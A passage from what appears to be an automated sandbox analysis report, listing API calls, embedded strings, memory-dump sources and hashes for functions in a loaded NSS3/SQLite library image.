                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C674FC4
                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(snippet), ref: 6C6DEF3C
                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(offsets), ref: 6C6DEFE4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C675001,?,00000003,00000000), ref: 6C79DFD7
                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C6DF087
                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C6DF129
                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(optimize), ref: 6C6DF1D1
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C6DF368
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                                                                                                          • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                                                                                          • API String ID: 2518200370-449611708
                                                                                                                                                                                                                                                                                          • Opcode ID: 0842f62df9c9a715359e932268bcc34ab488ad1a0011032c16df22760416ff1d
                                                                                                                                                                                                                                                                                          • Instruction ID: 9a4ad55435526414b8986064fb92167067d1e2caef89debd298d762911beeebb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0842f62df9c9a715359e932268bcc34ab488ad1a0011032c16df22760416ff1d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5502BFB2B042014BE7249F71988572B76B2BBC570CF1A893CD85A87B01EB75E846C7D7
                                                                                                                                                                                                                                                                                          Function 6C757C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C757C33
                                                                                                                                                                                                                                                                                          • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C757C66
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C757D1E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: SECOID_FindOID_Util.NSS3(?,?,?,6C7591C5), ref: 6C75788F
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C757D48
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C757D71
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C757DD3
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C757DE1
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C757DF8
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C757E1A
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C757E58
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7591C5), ref: 6C7578BB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C7591C5), ref: 6C7578FA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C7591C5), ref: 6C757930
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7591C5), ref: 6C757951
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C757964
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C75797A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C757988
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C757998
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: free.MOZGLUE(00000000), ref: 6C7579A7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C7591C5), ref: 6C7579BB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C757870: PR_GetCurrentThread.NSS3(?,?,?,?,6C7591C5), ref: 6C7579CA
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C757E49
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C757F8C
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C757F98
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C757FBF
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C757FD9
                                                                                                                                                                                                                                                                                          • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C758038
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C758050
                                                                                                                                                                                                                                                                                          • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C758093
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3 ref: 6C757F29
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6F8298,?,?,?,6C6EFCE5,?), ref: 6C7507BF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7507E6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C75081B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C750825
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C758072
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3 ref: 6C7580F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C75800A,00000000,?,00000000,?), ref: 6C75BC3F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2815116071-0
                                                                                                                                                                                                                                                                                          • Opcode ID: aa2c9de52a762ea129594f28a36df0d82c4c9ac9c2abd5f88b1d4807f8efb7f4
                                                                                                                                                                                                                                                                                          • Instruction ID: e007b5a513230684cea1152dd42e6ef3a5397b21e20f214ce1443cf061b236f1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa2c9de52a762ea129594f28a36df0d82c4c9ac9c2abd5f88b1d4807f8efb7f4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54E1B3716143009FD700CF29DA84B6B77E5AF44308F94896DE88A9BB51EB32EC25CB52
                                                                                                                                                                                                                                                                                          Function 6C6E1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6C6E1C6B
                                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C6E1C75
                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C6E1CA1
                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 6C6E1CA9
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C6E1CB4
                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C6E1CCC
                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C6E1CE4
                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 6C6E1CEC
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C6E1CFD
                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C6E1D0F
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C6E1D17
                                                                                                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32 ref: 6C6E1D4D
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C6E1D73
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C6E1D7F
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C6E1D7A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                                                                                          • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                                                                                          • API String ID: 3748115541-1216436346
                                                                                                                                                                                                                                                                                          • Opcode ID: f19f4fccbc7cf196c01a67e80c53ab827c413bdc510891273c660abf12d1c170
                                                                                                                                                                                                                                                                                          • Instruction ID: b113e8c22899b791d40c9b1ee2c7b1fd4d3721a3cc318b737f4888e9227c3d24
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f19f4fccbc7cf196c01a67e80c53ab827c413bdc510891273c660abf12d1c170
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E3151B1600218AFDB20EF64CC48AAABBF8EF4934CF008479F60892151E7305998CFA5
                                                                                                                                                                                                                                                                                          Function 6C6E3D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C6E3DFB
                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C6E3EEC
                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6E3FA3
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C6E4047
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6E40DE
                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6E415F
                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C6E416B
                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6E4288
                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6E42AB
                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C6E42B7
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                                                                                                                                          • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                                                                                                          • API String ID: 703928654-3678606288
                                                                                                                                                                                                                                                                                          • Opcode ID: acfa68ce69151a01ebe99fdf00733eb7ebd8d0d4488be9522efb5f8bbf27147d
                                                                                                                                                                                                                                                                                          • Instruction ID: 40e3f71d5998eaab662c431819412d6e0329571a8b2739410977fdbf5f4e7203
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acfa68ce69151a01ebe99fdf00733eb7ebd8d0d4488be9522efb5f8bbf27147d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F12471A0D7409FD725CF78C8807ABB7E6AF8A308F148A2EE88597751E770D445CB4A
                                                                                                                                                                                                                                                                                          Function 6C6EEF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6EEF63
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F87D0: PORT_NewArena_Util.NSS3(00000800,6C6EEF74,00000000), ref: 6C6F87E8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C6EEF74,00000000), ref: 6C6F87FD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C6F884C
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C6EF2D4
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6EF2FC
                                                                                                                                                                                                                                                                                          • SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C6EF30F
                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C6EF374
                                                                                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(6C832FD4,?), ref: 6C6EF457
                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C6EF4D2
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C6EF66E
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C6EF67D
                                                                                                                                                                                                                                                                                          • CERT_DestroyName.NSS3(?), ref: 6C6EF68B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C6F8338
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6F8364
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C6F838E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6F83A5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F83E3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C6F84D9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C6F8528
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?,00000000), ref: 6C6F8955
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
                                                                                                                                                                                                                                                                                          • String ID: "$*$oid.
                                                                                                                                                                                                                                                                                          • API String ID: 4161946812-2398207183
                                                                                                                                                                                                                                                                                          • Opcode ID: 6fd9041b048b27fc4d57d08594c2244879d2f723a00b1d80951fd99e8dc1866a
                                                                                                                                                                                                                                                                                          • Instruction ID: ed491ec6846f8975d54590839a68c84e490db6d765faf4524b6284ff0bf37172
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fd9041b048b27fc4d57d08594c2244879d2f723a00b1d80951fd99e8dc1866a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B322397160E3418FD714CE68E4903AAB7E6AB9D31CF184A2FE49587B91E7319805C78B
                                                                                                                                                                                                                                                                                          Function 6C691C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C691D58
                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C691EFD
                                                                                                                                                                                                                                                                                          • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C691FB7
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • unsupported file format, xrefs: 6C692188
                                                                                                                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 6C692223
                                                                                                                                                                                                                                                                                          • sqlite_master, xrefs: 6C691C61
                                                                                                                                                                                                                                                                                          • table, xrefs: 6C691C8B
                                                                                                                                                                                                                                                                                          • sqlite_temp_master, xrefs: 6C691C5C
                                                                                                                                                                                                                                                                                          • unknown error, xrefs: 6C692291
                                                                                                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 6C6920CA
                                                                                                                                                                                                                                                                                          • another row available, xrefs: 6C692287
                                                                                                                                                                                                                                                                                          • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C691F83
                                                                                                                                                                                                                                                                                          • no more rows available, xrefs: 6C692264
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                                                                                          • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                                                                                          • API String ID: 563213449-2102270813
                                                                                                                                                                                                                                                                                          • Opcode ID: ef8a8590dd404c5f5079eae0cacc48d6ff35c8d5da345ba7e07aabaa82cad91f
                                                                                                                                                                                                                                                                                          • Instruction ID: 5bd85e3cee08bc0f054ec4b163e29dbc6570efe3ca195fe21c85714404c987f2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef8a8590dd404c5f5079eae0cacc48d6ff35c8d5da345ba7e07aabaa82cad91f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE12F5706083428FD715CF19C484A5AB7F2FF85318F28896DD9958BB52D731EC4ACB8A
                                                                                                                                                                                                                                                                                          Function 6C6B5F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
                                                                                                                                                                                                                                                                                          • API String ID: 0-3593521594
                                                                                                                                                                                                                                                                                          • Opcode ID: a8820106a92f5746e8f51f8eef7e8f664706698c0fa2f4eaf2cadc5ae2dfc79d
                                                                                                                                                                                                                                                                                          • Instruction ID: 8e8498ffba5eccd33b9f08e987e5b4650ca519df1a6cf81dd06f6893ef7944d5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8820106a92f5746e8f51f8eef7e8f664706698c0fa2f4eaf2cadc5ae2dfc79d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F43A3746083418FD304CF19C490B5AB7F2FF89318F148A6DE899AB752D731E856CB9A
                                                                                                                                                                                                                                                                                          Function 6C75EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
